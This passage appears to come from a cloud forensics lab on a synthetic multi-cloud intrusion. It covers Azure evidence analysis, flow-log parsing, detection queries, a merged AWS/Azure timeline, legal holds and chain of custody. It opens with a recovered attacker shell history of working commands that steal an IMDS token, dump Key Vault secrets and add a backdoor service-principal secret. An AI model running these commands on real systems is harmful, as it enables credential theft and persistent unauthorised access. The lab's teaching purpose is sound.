$ sudo cat /mnt/forensic-evidence/azure-compliance-vm/root/.bash_history
# SYNTHETIC OUTPUT:
# curl -s -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net" -o /tmp/.az_token_cache
# export VAULT_TOKEN=$(cat /tmp/.az_token_cache | jq -r '.access_token')
# for secret in $(curl -s -H "Authorization: Bearer $VAULT_TOKEN" "https://kv-qfs-prod-eastus.vault.azure.net/secrets?api-version=7.4" | jq -r '.value[].id'); do curl -s -H "Authorization: Bearer $VAULT_TOKEN" "${secret}?api-version=7.4" >> /tmp/.kv_dump.json; done
# curl -s -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com" | jq -r '.access_token' > /tmp/.graph_token
# curl -s -H "Authorization: Bearer $(cat /tmp/.graph_token)" "https://graph.microsoft.com/v1.0/applications/a1b2c3d4-0000-0000-0000-000000000002" -X PATCH -H "Content-Type: application/json" -d '{"passwordCredentials":[{"displayName":"backup","endDateTime":"2027-03-24T00:00:00Z"}]}'
# cat /tmp/.kv_dump.json | jq '.value' > /tmp/.sp_creds.json
Critical Finding: Azure IMDS Token Theft and Key Vault Dump
The attacker accessed the Azure Instance Metadata Service (IMDS) on the compromised VM to obtain a Managed Identity OAuth token. Using this token, they:
- Enumerated all secrets in Key Vault `kv-qfs-prod-eastus`
- Read all 47 secrets (including database credentials and cross-cloud AWS keys)
- Obtained a Microsoft Graph token to modify the `sp-devops-pipeline` application
- Added a new client secret to `sp-devops-pipeline` for persistent access
This confirms the attack chain: VM compromise -> IMDS token theft -> Key Vault secret exfiltration -> Service Principal persistence.
Step 4.3: NSG Flow Logs Analysis¶
# ============================================================
# Step 4.3: Azure NSG Flow Logs — Network Evidence
# Identify lateral movement and external connections
# ============================================================
# List NSG Flow Log configuration
$ az network watcher flow-log list \
--location eastus \
--query '[].{name:name, nsg:targetResourceId, enabled:enabled, storageId:storageId}' \
--output table
# SYNTHETIC OUTPUT:
# Name NSG Enabled StorageId
# ---------------------- ------------------------------------ -------- ----------------------------
# nsg-flowlog-identity nsg-snet-identity true stqfsflowlogseastus
# nsg-flowlog-compliance nsg-snet-compliance true stqfsflowlogseastus
# Download NSG Flow Logs for the compliance subnet
$ az storage blob download \
--account-name stqfsflowlogseastus \
--container-name "insights-logs-networksecuritygroupflowevent" \
--name "resourceId=/SUBSCRIPTIONS/12345678-ABCD-EF01-2345-678901234567/RESOURCEGROUPS/RG-PRODUCTION/PROVIDERS/MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/NSG-SNET-COMPLIANCE/y=2026/m=03/d=24/h=14/m=00/macAddress=000000000001/PT1H.json" \
--file ~/cloud-dfir-lab24/evidence/azure/nsg-flows/compliance-subnet-20260324-14.json
# Parse NSG Flow Logs
$ cat ~/cloud-dfir-lab24/evidence/azure/nsg-flows/compliance-subnet-20260324-14.json | \
jq '.records[].properties.flows[].flows[].flowTuples[]' -r | \
head -20
# SYNTHETIC NSG FLOW LOG OUTPUT:
# timestamp,srcIP,dstIP,srcPort,dstPort,proto,direction,action,state,srcPackets,srcBytes,dstPackets,dstBytes
# 1774362912,10.150.2.10,10.150.1.5,45678,443,T,O,A,B,15,4096,12,3072
# 1774363095,10.150.2.10,203.0.113.42,45679,4443,T,O,A,B,8,2048,5,1024
# 1774363200,10.150.2.10,10.150.1.5,45680,443,T,O,A,B,22,8192,18,6144
# 1774364100,10.150.2.10,198.51.100.99,45681,443,T,O,A,E,1247,15678912,312,8192
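Each comma-separated flowTuple follows the NSG flow log v2 field order shown in the header comment above. A minimal parser for those tuples (field names are this sketch's convention):

```python
from datetime import datetime, timezone

# NSG flow log v2 flowTuple field order
FIELDS = ["ts", "src_ip", "dst_ip", "src_port", "dst_port",
          "proto", "direction", "action", "state",
          "src_packets", "src_bytes", "dst_packets", "dst_bytes"]

def parse_flow_tuple(tuple_str: str) -> dict:
    """Parse one NSG flow log v2 flowTuple string into a dict.
    Begin-state records may omit the trailing packet/byte counters."""
    rec = dict(zip(FIELDS, tuple_str.split(",")))
    rec["ts"] = datetime.fromtimestamp(int(rec["ts"]), tz=timezone.utc)
    for k in ("src_packets", "src_bytes", "dst_packets", "dst_bytes"):
        if rec.get(k) not in (None, ""):
            rec[k] = int(rec[k])
    return rec

rec = parse_flow_tuple(
    "1774364100,10.150.2.10,198.51.100.99,45681,443,T,O,A,E,1247,15678912,312,8192")
print(rec["dst_ip"], rec["src_bytes"])  # 198.51.100.99 15678912
```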
# Analyze the flows
$ python3 << 'PYEOF'
# SYNTHETIC — NSG Flow Log Analysis
flows = [
{"time": "14:35:12", "src": "10.150.2.10", "dst": "10.150.1.5", "dport": 443, "bytes_out": 4096, "desc": "Key Vault API access"},
{"time": "14:38:15", "src": "10.150.2.10", "dst": "203.0.113.42", "dport": 4443, "bytes_out": 2048, "desc": "C2 channel (SYNTHETIC)"},
{"time": "14:40:00", "src": "10.150.2.10", "dst": "10.150.1.5", "dport": 443, "bytes_out": 8192, "desc": "Graph API access"},
{"time": "14:55:00", "src": "10.150.2.10", "dst": "198.51.100.99", "dport": 443, "bytes_out": 15678912, "desc": "Data exfiltration (SYNTHETIC)"},
{"time": "15:10:00", "src": "10.150.2.10", "dst": "10.160.1.10", "dport": 443, "bytes_out": 4096, "desc": "AKS API access"},
{"time": "15:15:00", "src": "10.150.2.10", "dst": "10.160.2.5", "dport": 443, "bytes_out": 2048, "desc": "Storage account access"},
]
print("=" * 80)
print("NSG FLOW LOG ANALYSIS — vm-compliance-01 (10.150.2.10)")
print("Case: QFS-IR-2026-0042 | ALL DATA IS SYNTHETIC")
print("=" * 80)
print(f"\n{'Time':>10} {'Source':<16} {'Destination':<16} {'Port':>6} {'Bytes Out':>12} Description")
print("-" * 80)
for f in flows:
print(f"{f['time']:>10} {f['src']:<16} {f['dst']:<16} {f['dport']:>6} {f['bytes_out']:>12,} {f['desc']}")
total_exfil = sum(f["bytes_out"] for f in flows if "exfil" in f["desc"].lower())
print(f"\nTotal data exfiltrated to external IPs: {total_exfil / (1024*1024):.1f} MB")
print("External destinations: 203.0.113.42 (C2), 198.51.100.99 (exfil)")
print("Internal pivot targets: 10.150.1.5 (KV/Graph), 10.160.1.10 (AKS), 10.160.2.5 (Storage)")
PYEOF
Step 4.4: Azure Storage Account Access Forensics¶
# ============================================================
# Step 4.4: Azure Storage Account Access Investigation
# Check if the attacker accessed analytics data
# ============================================================
# Query Storage Analytics logs
$ az monitor activity-log list \
--resource-id "/subscriptions/12345678-abcd-ef01-2345-678901234567/resourceGroups/rg-analytics/providers/Microsoft.Storage/storageAccounts/stqfsanalyticswestus2" \
--start-time "2026-03-24T00:00:00Z" \
--end-time "2026-03-25T00:00:00Z" \
--output json | \
jq '[.[] | select(.caller | contains("mi-compliance") or contains("sp-devops")) |
{time: .eventTimestamp, caller: .caller, operation: .operationName.value,
status: .status.value}]'
# SYNTHETIC OUTPUT:
[
{
"time": "2026-03-24T15:15:33Z",
"caller": "mi-compliance-scanner",
"operation": "Microsoft.Storage/storageAccounts/listKeys/action",
"status": "Succeeded"
},
{
"time": "2026-03-24T15:16:00Z",
"caller": "mi-compliance-scanner",
"operation": "Microsoft.Storage/storageAccounts/blobServices/containers/read",
"status": "Succeeded"
},
{
"time": "2026-03-24T15:18:00Z",
"caller": "mi-compliance-scanner",
"operation": "Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read",
"status": "Succeeded"
}
]
# FINDING: Compromised identity listed storage keys and accessed blob data
# at 15:15 UTC — 40 minutes after the initial Key Vault breach
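The 40-minute gap cited in the finding falls out directly from the two timestamps (first Key Vault API access at 14:35:12Z per the NSG flow analysis; `listKeys` at 15:15:33Z above). A quick check — note that `datetime.fromisoformat` rejects a trailing `Z` before Python 3.11, hence the replace:

```python
from datetime import datetime

def utc(ts: str) -> datetime:
    """Parse an ISO-8601 UTC timestamp; 'Z' handled for Python < 3.11."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))

kv_breach = utc("2026-03-24T14:35:12Z")
storage_access = utc("2026-03-24T15:15:33Z")
gap = storage_access - kv_breach
print(f"Pivot to storage: {gap.total_seconds() / 60:.0f} min after the Key Vault breach")
```

Dwell-time deltas like this anchor the report's attack-phase narrative to evidence rather than analyst memory.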
Step 4.5: AKS Container Log Collection¶
# ============================================================
# Step 4.5: AKS Container Log Collection
# Check for container-level compromise
# ============================================================
# Get AKS cluster credentials (forensic read-only)
$ az aks get-credentials \
--resource-group rg-analytics \
--name aks-qfs-analytics \
--admin \
--file ~/cloud-dfir-lab24/evidence/azure/aks-kubeconfig
# Query Kubernetes audit logs from Log Analytics
// AKS Audit Log — Suspicious Container Activity
// Case: QFS-IR-2026-0042
AzureDiagnostics
| where TimeGenerated between (
datetime("2026-03-24T14:00:00Z") .. datetime("2026-03-25T00:00:00Z"))
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| where AuditLog.verb in ("get", "list", "create", "exec", "attach")
| where AuditLog.objectRef.resource in ("pods", "pods/exec", "secrets")
| project
TimeGenerated,
Verb = tostring(AuditLog.verb),
Resource = tostring(AuditLog.objectRef.resource),
Namespace = tostring(AuditLog.objectRef.namespace),
Name = tostring(AuditLog.objectRef.name),
User = tostring(AuditLog.user.username),
SourceIP = tostring(AuditLog.sourceIPs[0]),
Decision = tostring(AuditLog.annotations["authorization.k8s.io/decision"])
| order by TimeGenerated asc
# SYNTHETIC QUERY RESULTS:
# TimeGenerated Verb Resource Namespace Name User SourceIP Decision
# 2026-03-24T15:20:00 list secrets default - system:serviceaccount 10.150.2.10 allow
# 2026-03-24T15:20:30 get secrets kube-system cluster-secrets system:serviceaccount 10.150.2.10 allow
# 2026-03-24T15:22:00 exec pods/exec analytics spark-worker-01 system:serviceaccount 10.150.2.10 allow
# Check diagnostic settings coverage
$ az monitor diagnostic-settings list \
--resource "/subscriptions/12345678-abcd-ef01-2345-678901234567/resourceGroups/rg-analytics/providers/Microsoft.ContainerService/managedClusters/aks-qfs-analytics" \
--query '[].{name:name, categories:logs[?enabled==`true`].category}' \
--output json
# SYNTHETIC OUTPUT:
[
{
"name": "aks-diag-sentinel",
"categories": ["kube-audit", "kube-audit-admin", "guard"]
}
]
# FINDING: Attacker accessed Kubernetes secrets and exec'd into a pod
# from the compromised VM (10.150.2.10) at 15:20-15:22 UTC
Exercise 4 Detection Queries¶
// -----------------------------------------------------------------
// Detection: Azure IMDS Token Request from Unusual Process
// MITRE: T1552.005 — Cloud Instance Metadata API
// -----------------------------------------------------------------
// Requires VM-level logging (Sysmon for Linux or Microsoft Defender)
Syslog
| where TimeGenerated > ago(24h)
| where ProcessName in ("curl", "wget", "python", "python3")
| where SyslogMessage contains "169.254.169.254"
| where SyslogMessage contains "identity/oauth2/token"
| project TimeGenerated, Computer, ProcessName, SyslogMessage
| order by TimeGenerated asc
// -----------------------------------------------------------------
// Detection: Azure Storage Account Key Listed
// MITRE: T1552.001 — Unsecured Credentials
// -----------------------------------------------------------------
AzureActivity
| where TimeGenerated > ago(7d)
| where OperationNameValue == "Microsoft.Storage/storageAccounts/listKeys/action"
| where ActivityStatusValue == "Success"
| project TimeGenerated, Caller, CallerIpAddress, ResourceGroup,
Resource, OperationNameValue
| join kind=leftanti (
datatable(Caller: string) [
"known-automation-identity" // SYNTHETIC
]
) on Caller
| order by TimeGenerated desc
// -----------------------------------------------------------------
// Detection: AKS Pod Exec from External IP
// MITRE: T1609 — Container Administration Command
// -----------------------------------------------------------------
AzureDiagnostics
| where TimeGenerated > ago(24h)
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| where AuditLog.verb == "create"
| where AuditLog.objectRef.subresource == "exec"
| extend PodName = tostring(AuditLog.objectRef.name)
| extend Namespace = tostring(AuditLog.objectRef.namespace)
| extend User = tostring(AuditLog.user.username)
| extend SourceIP = tostring(AuditLog.sourceIPs[0])
| where SourceIP !startswith "10.160." // Not from expected AKS subnet
| project TimeGenerated, PodName, Namespace, User, SourceIP
// -----------------------------------------------------------------
// Detection: Azure IMDS Token Request from Unusual Process
// MITRE: T1552.005
// -----------------------------------------------------------------
index=azure_vms sourcetype="syslog"
(process="curl" OR process="wget" OR process="python" OR process="python3")
"169.254.169.254" "identity/oauth2/token"
earliest=-24h
| table _time, host, process, message
// -----------------------------------------------------------------
// Detection: Azure Storage Account Key Listed
// MITRE: T1552.001
// -----------------------------------------------------------------
index=azure sourcetype="azure:monitor:activity"
operationName.value="Microsoft.Storage/storageAccounts/listKeys/action"
status.value="Succeeded"
earliest=-7d
| search NOT Caller IN ("known-automation-identity")
| table _time, Caller, CallerIpAddress, ResourceGroup, Resource
// -----------------------------------------------------------------
// Detection: AKS Pod Exec from External IP
// MITRE: T1609
// -----------------------------------------------------------------
index=azure sourcetype="azure:monitor" Category="kube-audit"
earliest=-24h
| spath path=log_s output=AuditLog
| spath input=AuditLog path=verb output=Verb
| spath input=AuditLog path=objectRef.subresource output=SubResource
| where Verb="create" AND SubResource="exec"
| spath input=AuditLog path=objectRef.name output=PodName
| spath input=AuditLog path=objectRef.namespace output=Namespace
| spath input=AuditLog path=user.username output=User
| spath input=AuditLog path=sourceIPs{0} output=SourceIP
| where NOT cidrmatch("10.160.0.0/16", SourceIP)
| table _time, PodName, Namespace, User, SourceIP
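When VM syslog is available outside a SIEM, the same IMDS-theft detection logic can be prototyped in a few lines of Python (sample lines are synthetic; the patterns mirror the KQL/SPL queries above):

```python
import re

# A user-land tool requesting an IMDS identity token is the triage signal
IMDS_TOKEN = re.compile(r"169\.254\.169\.254.*identity/oauth2/token")
SUSPECT_PROCS = ("curl", "wget", "python", "python3")

def flag_imds_requests(syslog_lines):
    """Yield syslog lines where a suspect process hits the IMDS token endpoint."""
    for line in syslog_lines:
        if any(p in line for p in SUSPECT_PROCS) and IMDS_TOKEN.search(line):
            yield line

# SYNTHETIC sample lines
sample = [
    "Mar 24 14:35:10 vm-compliance-01 curl: GET http://169.254.169.254/metadata/identity/oauth2/token?resource=https://vault.azure.net",
    "Mar 24 14:35:11 vm-compliance-01 walinuxagent: heartbeat",
]
print(len(list(flag_imds_requests(sample))))  # 1
```

Workloads that legitimately use Managed Identity will also match, so in practice this needs an allowlist of expected processes per host, just as the Splunk query above allowlists known automation identities.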
Exercise 5: Cross-Cloud IR Coordination & Reporting¶
Exercise Objective
Coordinate the cross-cloud incident response by merging AWS and Azure forensic timelines, executing legal hold procedures, building comprehensive chain of custody documentation, writing the forensic report (executive summary and technical findings), preparing evidence for law enforcement handoff, and detecting anti-forensics techniques across both clouds.
MITRE ATT&CK Techniques:
- T1562.001 -- Impair Defenses: Disable or Modify Tools
- T1562.008 -- Impair Defenses: Disable or Modify Cloud Logs
- T1070.001 -- Indicator Removal: Clear Windows Event Logs
- T1070.004 -- Indicator Removal: File Deletion
Step 5.1: Multi-Cloud Timeline Correlation¶
#!/usr/bin/env python3
"""
Cross-Cloud Timeline Merger — AWS + Azure
Case: QFS-IR-2026-0042
All data is 100% SYNTHETIC
"""
from collections import defaultdict
# Define all events from both clouds (SYNTHETIC)
unified_timeline = [
# AWS Events
{"time": "2026-03-24T14:28:11Z", "cloud": "AWS", "category": "Reconnaissance",
"event": "GetCallerIdentity — attacker validates stolen credentials",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "Medium"},
{"time": "2026-03-24T14:28:15Z", "cloud": "AWS", "category": "Reconnaissance",
"event": "ListAttachedUserPolicies — enumerate account permissions",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "Medium"},
{"time": "2026-03-24T14:29:01Z", "cloud": "AWS", "category": "Reconnaissance",
"event": "ListUsers, ListRoles — enumerate IAM principals",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "Medium"},
{"time": "2026-03-24T14:30:12Z", "cloud": "AWS", "category": "Reconnaissance",
"event": "DescribeInstances/VPCs/Subnets/SGs — infrastructure mapping",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "Medium"},
{"time": "2026-03-24T14:32:10Z", "cloud": "AWS", "category": "Reconnaissance",
"event": "ListBuckets, GetBucketAcl, GetBucketPolicy — S3 enumeration",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "High"},
{"time": "2026-03-24T14:34:22Z", "cloud": "AWS", "category": "Credential Access",
"event": "ListSecrets, GetSecretValue — Secrets Manager access",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "Critical"},
# Azure Events — nearly simultaneous with AWS activity
{"time": "2026-03-24T14:35:12Z", "cloud": "Azure", "category": "Credential Access",
"event": "Key Vault SecretGet — mass secret enumeration begins (47 secrets in 3 min)",
"actor": "mi-compliance-scanner", "source_ip": "10.150.2.10", "severity": "Critical"},
{"time": "2026-03-24T14:36:12Z", "cloud": "AWS", "category": "Persistence",
"event": "CreateAccessKey — attacker creates new access key for dev-jenkins-ci",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "Critical"},
{"time": "2026-03-24T14:38:00Z", "cloud": "AWS", "category": "PrivEsc Attempt",
"event": "AssumeRole AdminFullAccess — DENIED",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "High"},
{"time": "2026-03-24T14:38:00Z", "cloud": "Azure", "category": "Detection",
"event": "Sentinel alert: Unusual Key Vault access by Managed Identity",
"actor": "SYSTEM", "source_ip": "N/A", "severity": "Medium"},
{"time": "2026-03-24T14:40:22Z", "cloud": "AWS", "category": "Resource Hijacking",
"event": "RunInstances — attacker launched EC2 instance (cryptomining suspected)",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "High"},
{"time": "2026-03-24T14:52:33Z", "cloud": "Azure", "category": "Persistence",
"event": "Service Principal sp-devops-pipeline — new client secret added",
"actor": "mi-compliance-scanner", "source_ip": "10.150.2.10", "severity": "Critical"},
{"time": "2026-03-24T15:02:33Z", "cloud": "AWS", "category": "Exfiltration Prep",
"event": "PutBucketPolicy — S3 data lake made public (Principal: *)",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "Critical"},
{"time": "2026-03-24T15:05:00Z", "cloud": "AWS", "category": "Data Access",
"event": "GetObject — multiple S3 data lake files accessed (PII, financial)",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "Critical"},
{"time": "2026-03-24T15:15:33Z", "cloud": "Azure", "category": "Credential Access",
"event": "Storage account listKeys — analytics storage keys retrieved",
"actor": "mi-compliance-scanner", "source_ip": "10.150.2.10", "severity": "High"},
{"time": "2026-03-24T15:20:00Z", "cloud": "Azure", "category": "Container Compromise",
"event": "AKS secrets listed, pod exec on spark-worker-01",
"actor": "mi-compliance-scanner", "source_ip": "10.150.2.10", "severity": "High"},
{"time": "2026-03-24T15:47:22Z", "cloud": "AWS", "category": "Anti-Forensics",
"event": "StopLogging — CloudTrail disable attempt — DENIED",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "Critical"},
{"time": "2026-03-24T15:48:05Z", "cloud": "AWS", "category": "Anti-Forensics",
"event": "DeleteTrail — CloudTrail delete attempt — DENIED",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "Critical"},
{"time": "2026-03-24T15:55:12Z", "cloud": "AWS", "category": "Lateral Movement",
"event": "SSM StartSession — attacker accessed API Gateway instance",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "Critical"},
{"time": "2026-03-24T15:58:00Z", "cloud": "AWS", "category": "Data Exfiltration",
"event": "Database export — 50k customer records via psql to /tmp/.staging/",
"actor": "dev-jenkins-ci (via SSM)", "source_ip": "10.100.1.15", "severity": "Critical"},
{"time": "2026-03-24T16:01:00Z", "cloud": "AWS", "category": "Data Exfiltration",
"event": "curl to 198.51.100.99 — compressed customer data exfiltrated (150+ MB)",
"actor": "dev-jenkins-ci (via SSM)", "source_ip": "10.100.1.15", "severity": "Critical"},
{"time": "2026-03-24T14:32:00Z", "cloud": "AWS", "category": "Detection",
"event": "GuardDuty alert: Recon:IAMUser/MaliciousIPCaller.Custom",
"actor": "SYSTEM", "source_ip": "N/A", "severity": "High"},
]
# Sort chronologically — ISO-8601 UTC timestamps sort correctly as strings
unified_timeline.sort(key=lambda x: x["time"])
# Print unified timeline
print("=" * 120)
print("UNIFIED CROSS-CLOUD INCIDENT TIMELINE")
print(f"Case: QFS-IR-2026-0042 | Quantum Financial Services")
print(f"Period: 2026-03-24T14:28:11Z — 2026-03-24T16:01:00Z (~1.5 hours)")
print("ALL DATA IS 100% SYNTHETIC")
print("=" * 120)
print()
print(f"{'Time':<24} {'Cloud':<8} {'Severity':<10} {'Category':<22} {'Event'}")
print("-" * 120)
for event in unified_timeline:
severity_marker = ""
if event["severity"] == "Critical":
severity_marker = "[!!!]"
elif event["severity"] == "High":
severity_marker = "[!!] "
elif event["severity"] == "Medium":
severity_marker = "[!] "
print(f"{event['time']:<24} {event['cloud']:<8} {severity_marker:<10} "
f"{event['category']:<22} {event['event']}")
# Print attack phase summary
print()
print("=" * 120)
print("ATTACK PHASE SUMMARY")
print("=" * 120)
phases = defaultdict(list)
for e in unified_timeline:
if e["actor"] != "SYSTEM":
phases[e["category"]].append(e)
for phase, events in phases.items():
clouds = set(e["cloud"] for e in events)
print(f"\n {phase} ({len(events)} events, clouds: {', '.join(clouds)})")
for e in events:
print(f" - {e['time']} [{e['cloud']}] {e['event'][:80]}")
print(f"\n{'='*120}")
print("CROSS-CLOUD CORRELATION FINDINGS:")
print(" 1. AWS and Azure attacks occurred nearly simultaneously (within 7 min)")
print(" 2. Common attacker IP 203.0.113.42: direct API calls in AWS, C2 channel for the Azure VM pivot")
print(" 3. Key Vault 'aws-cross-account-secret' links the two cloud environments")
print(" 4. Attack chain: stolen CI/CD creds -> AWS recon -> Azure VM compromise ->")
print(" Key Vault dump -> cross-cloud pivot -> data exfiltration from both clouds")
print(" 5. Anti-forensics attempted in AWS (CloudTrail disable) — DENIED")
print(" 6. Persistence established in both clouds (IAM key + SP credential)")
print(f"{'='*120}")
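A useful metric to pull from the merged timeline is detection latency per cloud: time from the first attacker action to the first SYSTEM alert. A sketch operating on the same event-dict shape used above (helper name is illustrative):

```python
from datetime import datetime

def detection_latency(timeline, cloud):
    """Seconds from the first attacker event to the first SYSTEM detection
    event for one cloud; None if either side is missing."""
    def utc(ts):
        return datetime.fromisoformat(ts.replace("Z", "+00:00"))
    attacker = [utc(e["time"]) for e in timeline
                if e["cloud"] == cloud and e["actor"] != "SYSTEM"]
    detections = [utc(e["time"]) for e in timeline
                  if e["cloud"] == cloud and e["actor"] == "SYSTEM"]
    if not attacker or not detections:
        return None
    return (min(detections) - min(attacker)).total_seconds()

# With the SYNTHETIC timeline above: first AWS attacker action at 14:28:11,
# GuardDuty alert at 14:32:00 — a latency of 229 seconds.
```

Reporting latency per cloud highlights monitoring gaps: a long Azure latency relative to AWS, for instance, argues for tighter Key Vault alerting.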
Step 5.2: Legal Hold Procedures¶
# ============================================================
# Step 5.2: Legal Hold Implementation
# Preserve all evidence for potential litigation/law enforcement
# ============================================================
# --- AWS Legal Hold ---
# 1. Enable S3 Object Lock on the forensic evidence bucket
$ aws s3api put-object-lock-configuration \
--bucket qfs-forensic-evidence-123456789012 \
--object-lock-configuration '{
"ObjectLockEnabled": "Enabled",
"Rule": {
"DefaultRetention": {
"Mode": "COMPLIANCE",
"Days": 2555
}
}
}' \
--profile forensics
# 2. Enable versioning on CloudTrail bucket (prevent log deletion)
$ aws s3api put-bucket-versioning \
--bucket qfs-cloudtrail-123456789012 \
--versioning-configuration Status=Enabled \
--profile forensics
# 3. Create IAM policy to prevent evidence deletion
$ cat > /tmp/evidence-protection-policy.json << 'POLICY_EOF'
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "PreventEvidenceDeletion",
"Effect": "Deny",
"Action": [
"s3:DeleteObject",
"s3:DeleteObjectVersion",
"s3:PutLifecycleConfiguration",
"ec2:DeleteSnapshot",
"ec2:DeregisterImage"
],
"Resource": "*",
"Condition": {
"StringEquals": {
"aws:ResourceTag/CaseId": "QFS-IR-2026-0042"
}
}
}
]
}
POLICY_EOF
$ aws iam create-policy \
--policy-name "LegalHold-QFS-IR-2026-0042" \
--policy-document file:///tmp/evidence-protection-policy.json \
--profile forensics
# --- Azure Legal Hold ---
# 1. Apply immutability policy to forensic storage
$ az storage container immutability-policy create \
--account-name stqfsforensicseastus \
--container-name "case-qfs-ir-2026-0042" \
--period 2555 \
--allow-protected-append-writes true
# 2. Lock forensic snapshots with resource locks
$ az lock create \
--name "LegalHold-QFS-IR-2026-0042" \
--resource-group rg-forensics \
--resource-name "forensic-snap-vm-compliance-01-os-20260324" \
--resource-type "Microsoft.Compute/snapshots" \
--lock-type CanNotDelete \
--notes "Legal hold for case QFS-IR-2026-0042. Do not remove without legal approval."
$ az lock create \
--name "LegalHold-QFS-IR-2026-0042" \
--resource-group rg-forensics \
--resource-name "forensic-snap-vm-compliance-01-data-20260324" \
--resource-type "Microsoft.Compute/snapshots" \
--lock-type CanNotDelete \
--notes "Legal hold for case QFS-IR-2026-0042. Do not remove without legal approval."
$ echo "[+] Legal holds applied to all evidence in AWS and Azure"
Step 5.3: Chain of Custody Master Record¶
# ============================================================
# Step 5.3: Consolidated Chain of Custody Document
# ============================================================
$ cat > ~/cloud-dfir-lab24/chain-of-custody/master-chain-of-custody.json << 'MASTER_COC_EOF'
{
"case_information": {
"case_id": "QFS-IR-2026-0042",
"case_title": "Quantum Financial Services Multi-Cloud Intrusion Investigation",
"classification": "CONFIDENTIAL",
"incident_date": "2026-03-24T14:28:00Z",
"detection_date": "2026-03-24T14:32:00Z",
"investigation_start": "2026-03-24T15:00:00Z",
"lead_investigator": "forensic-analyst@quantumfinancial.example.com",
"authorized_by": "ciso@quantumfinancial.example.com",
"legal_counsel": "legal@quantumfinancial.example.com",
"law_enforcement_case": "Pending referral"
},
"evidence_inventory": [
{
"evidence_id": "E001",
"description": "AWS CloudTrail Logs — us-east-1 — 2026-03-22 to 2026-03-25",
"type": "Cloud API Audit Logs",
"cloud": "AWS",
"source": "s3://qfs-cloudtrail-123456789012",
"file_count": 4287,
"size": "189 MB",
"hash_algorithm": "SHA-256",
"hash_manifest": "evidence_hashes_raw.sha256",
"integrity_validation": "72/72 digests valid, 4287/4287 files valid",
"acquisition_time": "2026-03-24T16:00:00Z",
"acquired_by": "forensic-analyst@quantumfinancial.example.com",
"storage": "Encrypted forensic workstation + S3 Object Lock (COMPLIANCE mode)"
},
{
"evidence_id": "E002",
"description": "EBS Snapshot — Root volume of i-0a1b2c3d4e5f6789a (API Gateway)",
"type": "Disk Image",
"cloud": "AWS",
"source": "vol-0a1b2c3d4e5f0001",
"snapshot_id": "snap-0a1b2c3d4e5f0001",
"size": "50 GB",
"hash_algorithm": "SHA-256",
"acquisition_time": "2026-03-24T16:30:00Z",
"acquired_by": "forensic-analyst@quantumfinancial.example.com",
"storage": "AWS EBS Snapshot — tagged DoNotDelete, legal hold policy"
},
{
"evidence_id": "E003",
"description": "EBS Snapshot — Data volume of i-0a1b2c3d4e5f6789a",
"type": "Disk Image",
"cloud": "AWS",
"source": "vol-0a1b2c3d4e5f0002",
"snapshot_id": "snap-0a1b2c3d4e5f0002",
"size": "200 GB",
"hash_algorithm": "SHA-256",
"acquisition_time": "2026-03-24T16:31:00Z",
"acquired_by": "forensic-analyst@quantumfinancial.example.com",
"storage": "AWS EBS Snapshot — tagged DoNotDelete, legal hold policy"
},
{
"evidence_id": "E004",
"description": "Memory dump — i-0a1b2c3d4e5f6789a (LiME format via AVML)",
"type": "Volatile Memory",
"cloud": "AWS",
"source": "i-0a1b2c3d4e5f6789a (16 GB RAM)",
"size": "16 GB",
"hash_algorithm": "SHA-256",
"acquisition_time": "2026-03-24T16:35:00Z",
"acquired_by": "forensic-analyst@quantumfinancial.example.com (via SSM Run Command)",
"storage": "Encrypted forensic workstation + S3 Object Lock"
},
{
"evidence_id": "E005",
"description": "Azure Activity Logs — 2026-03-22 to 2026-03-25",
"type": "Cloud Management Plane Logs",
"cloud": "Azure",
"source": "Azure Monitor — subscription 12345678-abcd-ef01-2345-678901234567",
"entry_count": 2341,
"hash_algorithm": "SHA-256",
"acquisition_time": "2026-03-24T17:00:00Z",
"acquired_by": "forensic-analyst@quantumfinancial.example.com",
"storage": "Encrypted forensic workstation + Azure immutable storage"
},
{
"evidence_id": "E006",
"description": "Azure VM OS Disk Snapshot — vm-compliance-01",
"type": "Disk Image",
"cloud": "Azure",
"snapshot_name": "forensic-snap-vm-compliance-01-os-20260324",
"size": "128 GB",
"hash_algorithm": "SHA-256",
"acquisition_time": "2026-03-24T17:00:00Z",
"acquired_by": "forensic-analyst@quantumfinancial.example.com",
"storage": "Azure Snapshot — resource lock CanNotDelete, legal hold"
},
{
"evidence_id": "E007",
"description": "Azure AD Sign-In and Audit Logs — 2026-03-22 to 2026-03-25",
"type": "Identity Audit Logs",
"cloud": "Azure",
"source": "Microsoft Graph API — auditLogs/signIns, auditLogs/directoryAudits",
"hash_algorithm": "SHA-256",
"acquisition_time": "2026-03-24T17:15:00Z",
"acquired_by": "forensic-analyst@quantumfinancial.example.com",
"storage": "Encrypted forensic workstation + Azure immutable storage"
},
{
"evidence_id": "E008",
"description": "VPC Flow Logs and NSG Flow Logs — incident window",
"type": "Network Flow Data",
"cloud": "AWS + Azure",
"source": "CloudWatch vpc-flow-logs-prod + Azure NSG Flow Logs",
"hash_algorithm": "SHA-256",
"acquisition_time": "2026-03-24T17:30:00Z",
"acquired_by": "forensic-analyst@quantumfinancial.example.com",
"storage": "Encrypted forensic workstation"
}
],
